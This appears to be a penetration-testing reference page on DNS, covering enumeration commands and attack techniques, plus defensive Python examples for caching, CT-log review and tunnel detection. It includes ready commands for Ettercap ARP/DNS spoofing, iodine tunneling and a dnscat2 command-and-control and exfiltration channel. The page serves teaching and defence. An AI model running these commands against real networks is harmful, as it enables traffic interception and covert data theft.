
# Domain Name System (DNS)

Default Port: 53

DNS (Domain Name System) functions as the internet's phonebook, converting user-friendly domain names into numerical IP addresses so that clients can reach online resources. DNS is a hierarchical and decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It translates human-readable domain names to the numerical IP addresses needed to locate and identify services and devices within network protocols.

DNS operates on a client-server model, with the resolver sending requests to DNS servers, which then respond with the requested information.

DNS operates primarily on port 53 and is facilitated by various types of servers:

  • Root Servers: These manage the highest level of the DNS hierarchy and oversee top-level domains globally, stepping in if lower-level servers fail to respond. ICANN supervises these 13 root servers.

  • Authoritative Nameservers: They hold the final authority for queries within their designated zones, providing definitive responses. If they cannot respond, queries are escalated to root servers.

  • Non-authoritative Nameservers: These servers lack domain ownership and acquire domain information through queries to other servers.

  • Caching DNS Servers: These servers store previous query answers for a specified duration, speeding up future responses. The cache duration is determined by the authoritative server.

  • Forwarding Servers: They simply forward queries to other servers.

  • Resolvers: Integrated into computers or routers, resolvers perform local name resolution without being authoritative.
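The resolution chain these server types form can be made concrete with a small simulation. The following Python is an added example written for this page, not code from the original: it models a root server, a TLD server and an authoritative server as in-memory zones (constructed names under example.com and the documentation range 192.0.2.0/24) and a caching resolver that starts at the root, follows referrals and honours the TTL the authoritative server attached to the answer.

```python
"""Toy model of iterative DNS resolution with a TTL-bounded cache.
Added illustration for this page, not code from the original. The zones,
server names and addresses below are constructed (example.com and the
192.0.2.0/24 range are reserved for documentation)."""
import time

# Constructed zone data: each server knows only its own zone and answers
# everything else with a referral, as real root/TLD/authoritative servers do.
SERVERS = {
    "root": {"NS": {"com.": "a.gtld-servers.test"}},
    "a.gtld-servers.test": {"NS": {"example.com.": "ns1.example.com"}},
    "ns1.example.com": {"A": {"www.example.com.": ("192.0.2.10", 300)}},
}

def ask(server, name):
    """Simulate one query to `server`. Returns ("answer", ip, ttl) when the
    server is authoritative for `name`, ("referral", next_server) when it only
    holds a delegation for a parent zone, or ("nxdomain",) otherwise."""
    zone = SERVERS[server]
    if name in zone.get("A", {}):
        ip, ttl = zone["A"][name]
        return ("answer", ip, ttl)
    labels = name.split(".")
    # Walk the parent suffixes (example.com., com., then the root) for a delegation.
    for i in range(1, len(labels)):
        suffix = ".".join(labels[i:])
        if suffix in zone.get("NS", {}):
            return ("referral", zone["NS"][suffix])
    return ("nxdomain",)

class Resolver:
    """A caching, iterative resolver: starts at the root, follows referrals,
    and honours the TTL the authoritative server attached to the answer."""

    def __init__(self, clock=time.time):
        self.cache = {}        # name -> (ip, expiry timestamp)
        self.clock = clock     # injectable for deterministic tests
        self.upstream_queries = 0

    def resolve(self, name):
        """Return (ip, source): source is "cache" or the answering server."""
        now = self.clock()
        hit = self.cache.get(name)
        if hit and hit[1] > now:
            return hit[0], "cache"
        server = "root"
        for _ in range(8):  # bound the referral chain against loops
            self.upstream_queries += 1
            reply = ask(server, name)
            if reply[0] == "answer":
                _, ip, ttl = reply
                self.cache[name] = (ip, now + ttl)
                return ip, server
            if reply[0] == "referral":
                server = reply[1]
                continue
            return None, server   # NXDOMAIN from the authoritative server
        raise RuntimeError("referral chain too long")

if __name__ == "__main__":
    r = Resolver()
    print(r.resolve("www.example.com."))   # first lookup walks root -> TLD -> auth
    print(r.resolve("www.example.com."))   # second lookup is served from cache
    print(r.upstream_queries, "upstream queries sent")
```

The injectable clock is what makes the TTL behaviour testable: advance it past the 300 seconds the authoritative server set and the resolver walks the hierarchy again instead of answering from cache.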


### Banner Grabbing

Banner grabbing is used to identify DNS server versions. You can use the following commands:

```bash
# Use dig to query the server's version string via the CHAOS class
dig version.bind CHAOS TXT @<DNS_IP>

# Alternatively, use the nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, open a raw UDP connection to the service with netcat
nc -nv -u <DNS_IP> 53
```

### DNS Server Discovery

Identifying the DNS servers associated with a target domain is a critical first step. Tools like dig and nslookup can be employed to find nameservers:

```bash
# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>
```

To automate subdomain discovery, you can use dnsenum or custom scripts:

```bash
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>
```

### Using dig

A command-line tool used to perform DNS queries and gather information about DNS servers.

```bash
# Query DNS records
dig <DOMAIN>

# Query a specific type of DNS record (e.g., A record)
dig A <DOMAIN>

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig <DOMAIN> @<DNS_IP>
```
### Using nslookup

For querying DNS servers for various records or performing reverse lookups:

```bash
# Perform DNS queries
nslookup <DOMAIN>

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX <DOMAIN>

# Query a specific DNS server
nslookup <DOMAIN> <DNS_IP>
```

### Using host

A tool used to perform DNS queries and determine IP addresses.

```bash
# Perform DNS query
host <DOMAIN>

# Query a specific type of DNS record (e.g., MX record)
host -t MX <DOMAIN>

# Perform a reverse DNS lookup
host <IP_ADDRESS>
```

### Any Record Query

To retrieve all available entries for a name from a DNS server in a single query, you can use the ANY type (many servers now answer ANY with a minimal or synthesized response, so an empty result does not mean the name has no records):

```bash
dig any <DOMAIN> @<DNS_IP>
```

### Zone Transfer

An AXFR query is a DNS protocol request used to retrieve all records of a zone from a DNS server; an authoritative server that does not restrict transfers (for example with BIND's `allow-transfer`) hands the complete zone to any client that asks. You can use the following commands:

```bash
# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, you can use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>
```

### Metasploit Modules and Nmap Scripts

For utilizing Metasploit modules or Nmap scripts for enumeration:

```bash
use auxiliary/gather/enum_dns
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>
```

### DNS Reverse and Subdomain Brute Force

For conducting DNS reverse and subdomain brute force:

```bash
# Reverse lookups over an address range, asking a specific nameserver
dnsrecon -r <IP_RANGE> -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>

# Standard enumeration plus a zone transfer attempt (-a) against the domain
dnsrecon -d active.htb -a -n <IP_DNS>
```

### DNS Cache Snooping

DNS cache snooping is a technique that asks a resolver, with recursion disabled, whether it already holds a given record in its cache. Because a cached answer means some client behind that resolver looked the name up recently, the technique reveals which hosts, services and vendors a network has been communicating with.

```bash
# Query the resolver's cache for each name in a wordlist
dnsrecon -t snoop -n <DNS_IP> -D /usr/share/dnsrecon/namelist.txt
```

### DNS Enumeration with Google Dorks

DNS enumeration using Google Dorks involves collecting DNS information for a specific domain using advanced Google search operators. This method serves as a comprehensive information gathering technique for cybersecurity assessments.

# Collecting DNS information using Google Dorks

### DNS Enumeration Using Maltego

Visualization tools like Maltego can be used to collect and visualize DNS information. This provides a more comprehensive analysis, representing relationships and connections within the target network visually.

# DNS mapping with Maltego

### DNS Enumeration Using Online Tools

Various online DNS enumeration tools are available to gather and analyze DNS information. These tools typically perform extensive queries and present results conveniently.

  1. DNS Dumpster: An online tool used to gather DNS information for a specific domain. It provides subdomains, MX records, NS records, and more.

  2. DNS Recon: A comprehensive information gathering and penetration testing tool for domains. It includes subdomains, DNS records, reverse DNS queries, and more.

  3. Spyse: A platform for extensive asset gathering. It includes DNS information, subdomains, SSL certificates, and more.

  4. SecurityTrails: A platform for asset tracking. It includes DNS history, subdomains, IP addresses, and more.

  5. DNSlytics: An online platform for researching and analyzing DNS information. It provides WHOIS data, DNS records, domain history, and more.

### DNS Enumeration via Certificate Transparency Logs

Certificate Transparency (CT) logs record publicly trusted SSL/TLS certificates, including every domain name and subdomain each certificate covers. Searching these logs reveals subdomains and services used by a target.

  1. CertSpotter: Use online tools such as CertSpotter to search the CT logs for a specific domain.

  2. Subdomain Enumeration: Examine the SSL/TLS certificates listed in the CT logs and identify the subdomains associated with the target domain.
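As an added illustration (not code from this page or from any CT service), the following Python parses search results in the shape of crt.sh's JSON export, reduces them to the names under a target domain, and diffs them against an asset inventory, which is how a defender uses the same data to find forgotten hosts or certificates issued for the domain without the team's knowledge. The field names `name_value` and `common_name`, the sample records and the inventory are assumptions constructed for the example.

```python
"""Extract a domain's subdomains from Certificate Transparency search results
and compare them with an asset inventory. Added example for this page, not
code from the original or from any CT service. The JSON below is constructed
in the shape of crt.sh's JSON output (assumed fields: `common_name` and a
newline-separated `name_value`); no real CT data is included."""
import json

SAMPLE_CT_JSON = json.dumps([
    {"common_name": "www.example.com", "name_value": "www.example.com\nexample.com"},
    {"common_name": "*.example.com", "name_value": "*.example.com\nexample.com"},
    {"common_name": "vpn.example.com", "name_value": "VPN.Example.com."},
    {"common_name": "mail.example.com",
     "name_value": "mail.example.com\nautodiscover.example.com"},
    {"common_name": "example.com.evil.test", "name_value": "example.com.evil.test"},
])

def extract_subdomains(ct_json_text, domain):
    """Return (names, wildcards): lower-cased, de-duplicated names equal to or
    under `domain`. Look-alikes such as example.com.evil.test are excluded
    because they do not end in ".<domain>"."""
    domain = domain.lower().rstrip(".")
    suffix = "." + domain
    names, wildcards = set(), set()
    for record in json.loads(ct_json_text):
        candidates = set(record.get("name_value", "").split("\n"))
        candidates.add(record.get("common_name", ""))
        for raw in candidates:
            name = raw.strip().lower().rstrip(".")
            if not name or not (name == domain or name.endswith(suffix)):
                continue
            (wildcards if name.startswith("*.") else names).add(name)
    return sorted(names), sorted(wildcards)

def unexpected_hosts(ct_json_text, domain, inventory):
    """Names present in CT logs that the inventory does not know about:
    forgotten hosts, shadow IT, or certificates someone else obtained."""
    names, _ = extract_subdomains(ct_json_text, domain)
    known = {h.lower().rstrip(".") for h in inventory}
    return [n for n in names if n not in known]

if __name__ == "__main__":
    # Constructed inventory of the hosts the team believes it operates.
    inventory = {"example.com", "www.example.com", "mail.example.com"}
    print(extract_subdomains(SAMPLE_CT_JSON, "example.com"))
    print(unexpected_hosts(SAMPLE_CT_JSON, "example.com", inventory))
```

Wildcard entries are reported separately because `*.example.com` says nothing about which hosts exist; the suffix check is what keeps attacker-registered look-alike domains out of the result.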

## Attack Vectors

### DNS Spoofing

DNS spoofing involves introducing corrupt Domain Name System data into a DNS resolver's cache, causing the name server to return an incorrect IP address and diverting traffic to the attacker's computer.

#### Poisoning with Ettercap

Ettercap is a comprehensive suite for man-in-the-middle attacks on a LAN. It can be used for DNS spoofing.

```bash
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof
```

### DNS Tunneling

DNS tunneling leverages DNS queries and responses to encapsulate the data of other programs or protocols, so that arbitrary traffic passes through a network whose only outbound path is DNS resolution. In resolver logs such traffic stands out as bursts of long, high-entropy subdomains under one parent domain and unusual record types such as TXT or NULL.

#### Setup with Iodine

Iodine lets you tunnel IPv4 data through a DNS server.

```bash
# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>
```


### Cache Snooping

Cache snooping is a technique to determine if a DNS server has specific records in its cache. The query is sent with recursion disabled, so the server can only answer from what it already holds.

```bash
dig @<dns-server> <domain> +norecurse
```
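To show what `+norecurse` does on the wire, and how the answer should be read, here is an added Python example that is not part of the original page: it builds a DNS query with the RD bit cleared, parses the response header and answer section, and classifies the reply (cached, authoritative, not cached, or refused). The response packets are constructed by `make_response` for offline use, not captured traffic; the function names and the `QTYPE` table are this example's own.

```python
"""Minimal DNS wire-format encoder/parser (RFC 1035), added as an illustration
for this page rather than taken from it. It shows what a non-recursive probe
(RD bit cleared) reveals about a resolver's cache: an answer that comes back
without the AA bit was served from cache. The responses used in the demo are
constructed in make_response(), not captured traffic."""
import random
import struct

QTYPE = {"A": 1, "NS": 2, "TXT": 16, "AAAA": 28}

def encode_name(name):
    """example.com -> b'\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(name, qtype="A", recursion_desired=True, txid=None):
    """Header (12 bytes) + one question. RD is bit 8 of the flags word."""
    txid = random.randrange(0x10000) if txid is None else txid
    flags = 0x0100 if recursion_desired else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE[qtype], 1)

def decode_name(data, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, jumped, end = [], False, None
    for _ in range(128):  # bound pointer chains from malformed packets
        length = data[offset]
        if length & 0xC0 == 0xC0:  # 2-byte compression pointer
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) + ".", (end if jumped else offset)

def parse_response(data):
    """Return header bits and the answer section as (name, type, ttl, rdata)."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    for _ in range(qd):                      # skip the echoed question(s)
        _, offset = decode_name(data, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:        # render A records as dotted quads
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "aa": bool(flags & 0x0400), "rd": bool(flags & 0x0100),
            "ra": bool(flags & 0x0080), "rcode": flags & 0x000F, "answers": answers}

def cache_verdict(parsed):
    """Interpret the reply to an RD=0 probe. A resolver that restricts
    non-recursive queries (BIND: allow-query-cache) answers REFUSED instead."""
    if parsed["rcode"] == 5:
        return "refused"
    if parsed["answers"]:
        return "authoritative" if parsed["aa"] else "cached"
    return "not-cached"

def make_response(query, answers, aa=False, rcode=0):
    """Constructed reply to `query` for offline testing: QR=1, RA=1, RD echoed,
    A records pointing at the question name via a compression pointer."""
    txid = struct.unpack("!H", query[:2])[0]
    rd = struct.unpack("!H", query[2:4])[0] & 0x0100
    flags = 0x8080 | (0x0400 if aa else 0) | rd | rcode
    header = struct.pack("!HHHHHH", txid, flags, 1, len(answers), 0, 0)
    body = b""
    for ip, ttl in answers:
        body += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)
        body += bytes(int(o) for o in ip.split("."))
    return header + query[12:] + body

if __name__ == "__main__":
    probe = build_query("www.example.com", "A", recursion_desired=False)
    for label, reply in [("cached", make_response(probe, [("192.0.2.10", 120)])),
                         ("empty", make_response(probe, [])),
                         ("refused", make_response(probe, [], rcode=5))]:
        print(label, "->", cache_verdict(parse_response(reply)))
```

A resolver that should not be snoopable by outsiders answers such probes with REFUSED (in BIND, restrict `allow-query-cache` and `allow-recursion` to the clients the resolver serves); the verdict function treats rcode 5 as that case. The TTL in a cached answer is also informative: it is lower than the authoritative TTL by however long the record has sat in cache.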

### Reverse DNS Lookup

Reverse DNS lookup is a DNS query for the domain name associated with a given IP address.

```bash
dig -x <ip-address>
```

### DNS Exfiltration

Data exfiltration over DNS involves encoding data in DNS queries and responses, allowing data to be extracted from a network covertly.

#### Exfiltration with dnscat2

dnscat2 is designed to create an encrypted command-and-control channel over DNS. The server is the Ruby program `dnscat2.rb`; the client is the `dnscat` binary.

```bash
# Server side (authoritative for <domain>, listening on port 53)
ruby dnscat2.rb --dns "domain=<domain>,host=<dns-server-ip>,port=53"

# Client side
dnscat --dns domain=<domain>
```
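Both the tunneling and the exfiltration techniques above depend on a resolver forwarding a stream of unusual names, and that is what a defender can look for. The following Python is an added example (not code from this page, from iodine or from dnscat2) that scores constructed query-log lines on name length, label entropy and record type and aggregates the results per parent domain, so that a burst of encoded subdomains under one domain surfaces even when each query looks unremarkable on its own. The log format, the thresholds, the use of the last two labels as the parent domain, and all sample lines are assumptions made for the example.

```python
"""Heuristic detector for DNS tunnelling / exfiltration patterns in resolver
query logs. Added example for this page, not code from the original or from
any tool it names. The log format and all lines are constructed:
"<epoch> <client-ip> <qname> <qtype>". Real deployments would read the
resolver's own query log and derive the registrable domain from the public
suffix list rather than the last two labels assumed here."""
import math
from collections import Counter, defaultdict

TUNNEL_TYPES = {"TXT", "NULL", "CNAME", "MX"}   # types tunnels use for large payloads
LONG_NAME = 40          # qname length beyond which we take note (assumption)
HIGH_ENTROPY = 3.5      # bits per character; base32/base64 payloads exceed this
UNIQUE_SUBDOMAINS = 20  # distinct names under one parent within the window

# Constructed sample: ordinary traffic to example.com plus four tunnel-style
# queries whose leftmost label is a base32-like blob (documentation TLD .test).
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 mail.example.com MX
1700000002 10.0.0.7 q7m3zk2xbfa5wcy4ndhjtv6pgsleioru.t.badexfil.test TXT
1700000002 10.0.0.7 e4rkz6hb2sxnqm7wfgva3lcp5ytioujd.t.badexfil.test TXT
1700000003 10.0.0.7 t5ngx2ae7hmkbzqdcw4rfyv3oslpuj6i.t.badexfil.test TXT
1700000003 10.0.0.7 y2pc6ksatbx7dvqzm4nojw3hfgrie5lu.t.badexfil.test NULL
1700000004 10.0.0.9 cdn.example.com A
1700000004 10.0.0.9 api.example.com AAAA
this line is malformed and must be skipped
"""

def shannon_entropy(text):
    """Bits per character of `text`; 0 for empty or single-symbol strings."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def split_name(qname):
    """Return (parent, data): parent is the last two labels, data is everything
    to the left joined together (the part a tunnel client controls)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), "".join(labels[:-2])

def query_reasons(qname, qtype):
    """List the indicators a single query trips; an empty list is benign."""
    _, data = split_name(qname)
    reasons = []
    if len(qname) > LONG_NAME:
        reasons.append("long-name")
    if shannon_entropy(data) > HIGH_ENTROPY:
        reasons.append("high-entropy")
    if qtype.upper() in TUNNEL_TYPES and reasons:  # rare type counts only with another sign
        reasons.append("tunnel-type")
    return reasons

def analyze(log_text):
    """Aggregate per parent domain: query count, distinct subdomains, queries
    with at least two indicators, and the union of indicators seen."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "suspicious": 0, "reasons": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue                     # skip malformed lines rather than crash
        _, _, qname, qtype = parts
        parent, _ = split_name(qname)
        reasons = query_reasons(qname, qtype)
        s = stats[parent]
        s["queries"] += 1
        s["names"].add(qname.lower())
        s["reasons"].update(reasons)
        if len(reasons) >= 2:
            s["suspicious"] += 1
    return {p: {"queries": s["queries"], "unique": len(s["names"]),
                "suspicious": s["suspicious"], "reasons": sorted(s["reasons"])}
            for p, s in stats.items()}

def flagged_domains(log_text):
    """Parents worth an analyst's look: any multi-indicator query, or an
    unusually large number of distinct subdomains in the window."""
    return sorted(p for p, s in analyze(log_text).items()
                  if s["suspicious"] > 0 or s["unique"] > UNIQUE_SUBDOMAINS)

if __name__ == "__main__":
    for parent, s in analyze(SAMPLE_LOG).items():
        print(parent, s)
    print("flagged:", flagged_domains(SAMPLE_LOG))
```

The thresholds are starting points rather than calibrated values: CDNs, anti-spam and telemetry services also generate long, high-entropy names, so the per-domain aggregation and an allow-list of known parents matter more than any single query score.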